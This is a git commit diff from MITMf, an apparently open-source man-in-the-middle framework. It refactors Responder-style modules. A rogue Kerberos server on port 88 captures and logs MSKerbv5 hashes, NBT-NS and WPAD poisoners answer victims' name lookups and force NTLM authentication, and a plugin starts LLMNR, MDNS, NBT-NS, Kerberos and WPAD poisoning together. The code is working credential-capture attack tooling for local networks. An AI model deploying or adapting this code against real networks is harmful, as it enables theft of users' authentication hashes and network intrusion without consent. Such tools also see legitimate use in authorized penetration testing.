Kerberos sever back online, squashed some bugs

2025-07-07 13:32:18 -07:00 · 2015-04-30 00:10:55 +02:00 · 2015-04-30 00:10:55 +02:00 · aa4e022ab0
commit aa4e022ab0
parent 6b421d1cac
7 changed files with 93 additions and 77 deletions
--- a/core/responder/fingerprinter/LANFingerprinter.py
+++ b/core/responder/fingerprinter/LANFingerprinter.py
@ -3,9 +3,9 @@ import socket
 import threading
 import struct
 import logging
+import string

 from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
-from core.configwatcher import ConfigWatcher
 from core.responder.fingerprinter.RAPLANMANPackets import *

 mitmf_logger = logging.getLogger("mitmf")
@ -60,6 +60,20 @@ def NBT_NS_Role(data):
    else:
        return "Service not known."

+def Decode_Name(nbname):
+    #From http://code.google.com/p/dpkt/ with author's permission.
+    try:
+        if len(nbname) != 32:
+            return nbname
+        l = []
+        for i in range(0, 32, 2):
+            l.append(chr(((ord(nbname[i]) - 0x41) << 4) |
+                       ((ord(nbname[i+1]) - 0x41) & 0xf)))
+        return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
+    except Exception, e:
+        mitmf_logger.debug("[LANFingerprinter] Error parsing NetBIOS name: {}".format(e))
+        return "Illegal NetBIOS name"
+
 def WorkstationFingerPrint(data):
    Role = {
        "\x04\x00"    :"Windows 95",
--- a/core/responder/kerberos/KERBServer.py
+++ b/core/responder/kerberos/KERBServer.py
@ -1,36 +1,38 @@
-##################################################################################
-#Kerberos Server stuff starts here
-##################################################################################
+
+import socket
+import threading
+import struct
+import logging
+
+from SocketServer import UDPServer, TCPServer, ThreadingMixIn, BaseRequestHandler
+
+mitmf_logger = logging.getLogger("mitmf")

 class KERBServer():

-	def serve_thread_udp(host, port, handler):
+	def serve_thread_udp(self, host, port, handler):
 		try:
 			server = ThreadingUDPServer((host, port), handler)
 			server.serve_forever()
 		except Exception, e:
-			print "Error starting UDP server on port %s: %s:" % (str(port),str(e))
+			mitmf_logger.debug("[KERBServer] Error starting UDP server on port 88: {}:".format(e))

-	def serve_thread_tcp(host, port, handler):
+	def serve_thread_tcp(self, host, port, handler):
 		try:
 			server = ThreadingTCPServer((host, port), handler)
 			server.serve_forever()
 		except Exception, e:
-			print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
+			mitmf_logger.debug("[KERBServer] Error starting TCP server on port 88: {}:".format(e))

 	#Function name self-explanatory
-	def start(Krb_On_Off):
-		if Krb_On_Off == "ON":
-			t1 = threading.Thread(name="KerbUDP", target=serve_thread_udp, args=("0.0.0.0", 88,KerbUDP))
-			t2 = threading.Thread(name="KerbTCP", target=serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP))
+	def start(self):
+		mitmf_logger.debug("[KERBServer] online")
+		t1 = threading.Thread(name="KERBServerUDP", target=self.serve_thread_udp, args=("0.0.0.0", 88,KerbUDP))
+		t2 = threading.Thread(name="KERBServerTCP", target=self.serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP))
 		for t in [t1,t2]:
 			t.setDaemon(True)
 			t.start()

-			return t1, t2
-		if Krb_On_Off == "OFF":
-			return False
-
 class ThreadingUDPServer(ThreadingMixIn, UDPServer):

 	allow_reuse_address = 1
@ -45,6 +47,28 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 	def server_bind(self):
 		TCPServer.server_bind(self)

+class KerbTCP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			data = self.request.recv(1024)
+			KerbHash = ParseMSKerbv5TCP(data)
+			if KerbHash:
+				mitmf_logger.info('[KERBServer] MSKerbv5 complete hash is: {}'.format(KerbHash))
+		except Exception:
+			raise
+
+class KerbUDP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			data, soc = self.request
+			KerbHash = ParseMSKerbv5UDP(data)
+			if KerbHash:
+				mitmf_logger.info('[KERBServer] MSKerbv5 complete hash is: {}'.format(KerbHash))
+		except Exception:
+			raise
+
 def ParseMSKerbv5TCP(Data):
 	MsgType = Data[21:22]
 	EncType = Data[43:44]
@ -131,33 +155,3 @@ def ParseMSKerbv5UDP(Data):
 			return BuildHash
 	else:
 		return False
-
-class KerbTCP(BaseRequestHandler):
-
-	def handle(self):
-		try:
-			data = self.request.recv(1024)
-			KerbHash = ParseMSKerbv5TCP(data)
-			if KerbHash:
-				Outfile = "./logs/responder/MSKerberos-Client-"+self.client_address[0]+".txt"
-				WriteData(Outfile,KerbHash, KerbHash)
-				responder_logger.info('[+]MSKerbv5 complete hash is :%s'%(KerbHash))
-		except Exception:
-			raise
-
-class KerbUDP(BaseRequestHandler):
-
-	def handle(self):
-		try:
-			data, soc = self.request
-			KerbHash = ParseMSKerbv5UDP(data)
-			if KerbHash:
-				Outfile = "./logs/responder/MSKerberos-Client-"+self.client_address[0]+".txt"
-				WriteData(Outfile,KerbHash, KerbHash)
-				responder_logger.info('[+]MSKerbv5 complete hash is :%s'%(KerbHash))
-		except Exception:
-			raise
-
-##################################################################################
-#Kerberos Server stuff ends here
-##################################################################################
--- a/core/responder/kerberos/init.py
+++ b/core/responder/kerberos/init.py
--- a/core/responder/nbtns/NBTNSPoisoner.py
+++ b/core/responder/nbtns/NBTNSPoisoner.py
@ -4,6 +4,7 @@ import threading
 import socket
 import struct
 import logging
+import string

 from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
 from core.configwatcher import ConfigWatcher
@ -105,7 +106,8 @@ def Decode_Name(nbname):
 			l.append(chr(((ord(nbname[i]) - 0x41) << 4) |
 					   ((ord(nbname[i+1]) - 0x41) & 0xf)))
 		return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
-	except:
+	except Exception, e:
+		mitmf_logger.debug("[NBTNSPoisoner] Error parsing NetBIOS name: {}".format(e))
 		return "Illegal NetBIOS name"

 # NBT_NS Server class.
--- a/core/responder/wpad/WPADPoisoner.py
+++ b/core/responder/wpad/WPADPoisoner.py
@ -2,15 +2,17 @@ import socket
 import threading
 import logging

-from HTTPPackets import *
 from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
+from core.configwatcher import ConfigWatcher
+from HTTPPackets import *

 mitmf_logger = logging.getLogger("mitmf")

 class WPADPoisoner():

-	def start(on_off):
+	def start(self):
 		try:
+			mitmf_logger.debug("[WPADPoisoner] online")
 			server = ThreadingTCPServer(("0.0.0.0", 80), HTTP)
 			t = threading.Thread(name="HTTP", target=server.serve_forever)
 			t.setDaemon(True)
@ -25,6 +27,27 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 	def server_bind(self):
 		TCPServer.server_bind(self)

+#HTTP Server Class
+class HTTP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			while True:
+				self.request.settimeout(1)
+				data = self.request.recv(8092)
+				buff = WpadCustom(data,self.client_address[0])
+				if buff and WpadForcedAuth(Force_WPAD_Auth) == False:
+					Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0])
+					if Verbose:
+						print Message
+					mitmf_logger.info(Message)
+					self.request.send(buff)
+				else:
+					buffer0 = PacketSequence(data,self.client_address[0])
+					self.request.send(buffer0)
+		except Exception:
+			pass#No need to be verbose..
+
 #Parse NTLMv1/v2 hash.
 def ParseHTTPHash(data,client):
 	LMhashLen = struct.unpack('<H',data[12:14])[0]
@ -215,24 +238,3 @@ def PacketSequence(data,client):
 	else:
 		return str(Basic_Ntlm(Basic))
 			
-#HTTP Server Class
-class HTTP(BaseRequestHandler):
-
-	def handle(self):
-		try:
-			while True:
-				self.request.settimeout(1)
-				data = self.request.recv(8092)
-				buff = WpadCustom(data,self.client_address[0])
-				if buff and WpadForcedAuth(Force_WPAD_Auth) == False:
-					Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0])
-					if Verbose:
-						print Message
-					mitmf_logger.info(Message)
-					self.request.send(buff)
-				else:
-					buffer0 = PacketSequence(data,self.client_address[0])
-					self.request.send(buffer0)
-		except Exception:
-			pass#No need to be verbose..
-			
--- a/mitmf.py
+++ b/mitmf.py
@ -176,6 +176,7 @@ SMBserver().start()
 #start the reactor
 reactor.run()

+print "\n"
 #run each plugins finish() on exit
 for p in load:
    p.finish()
--- a/plugins/Responder.py
+++ b/plugins/Responder.py
@ -30,6 +30,8 @@ from core.responder.wpad.WPADPoisoner import WPADPoisoner
 from core.responder.mdns.MDNSPoisoner import MDNSPoisoner
 from core.responder.nbtns.NBTNSPoisoner import NBTNSPoisoner
 from core.responder.fingerprinter.LANFingerprinter import LANFingerprinter
+from core.responder.wpad.WPADPoisoner import WPADPoisoner
+from core.responder.kerberos.KERBServer import KERBServer

 class Responder(Plugin):
    name        = "Responder"
@ -50,10 +52,11 @@ class Responder(Plugin):
        except Exception, e:
            sys.exit('[-] Error parsing config for Responder: ' + str(e))

-        LLMNRPoisoner().start(options, self.ourip)
-        MDNSPoisoner().start(options, self.ourip)
-        NBTNSPoisoner().start(options, self.ourip)
        LANFingerprinter().start(options)
+        MDNSPoisoner().start(options, self.ourip)
+        KERBServer().start()
+        NBTNSPoisoner().start(options, self.ourip)
+        LLMNRPoisoner().start(options, self.ourip)
        
        if options.wpad:
            WPADPoisoner().start()